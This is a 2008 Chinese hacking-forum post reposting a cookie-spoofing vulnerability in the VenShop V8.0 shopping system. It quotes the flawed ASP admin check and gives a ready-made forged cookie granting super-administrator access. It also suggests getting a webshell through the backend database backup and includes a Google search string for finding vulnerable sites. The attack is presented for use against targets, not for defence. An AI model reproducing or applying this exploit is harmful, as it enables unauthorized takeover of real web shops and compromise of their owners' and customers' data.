凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞
123170071

诱惑犯罪

正式会员

策划者

贴子 1565

精华 0

积分 786

信用 0

竞猜 0

魅力 6

威望 0

现金 215 CZB

银行 11 CZB

黄金 0

比特币 0

注册时间 2007-12-17

发表于:2008-03-16 13:03:33   |  只看该作者   |  本帖随机奖励楼主:0 CZB   |  转账至  123170071

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞  

来源:Trace’s Space

代码http://www.venshop.com/down/venshop.rar
小程序,备忘一下
ad_chk.asp判断管理员登陆状态  
<%
if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")="" or Request.Cookies("venshop")("admin_class")="" then
Response.Cookies("venshop")("admin_name")=""
Response.Cookies("venshop")("admin_pass")=""
Response.Cookies("venshop")("admin_class")=""
response.redirect "ad_login.asp"
response.end
end if
%>
判断admin_class  
C:\Inetpub\wwwroot>findstr /i /n /s "admin_class" *.asp
ad_admin.asp:29: rs("admin_class")=request("class1")
ad_admin.asp:43:rs("admin_class")=request("class")
ad_admin.asp:92:
ad_admin.asp:93:
ad_admin.asp:94:
........................
可以看出当admin_class=0的时候就是总管理员身份了。
伪造cookie如下  
Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin
然后访问http://www.target.com/ad_manage.asp即可,后台有数据库备份可以拿webshell。

inurl:"views.asp?hw_id="#google
我非英雄·广目无双·我本坏蛋·无限嚣张
楼主
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删主题    删主题    |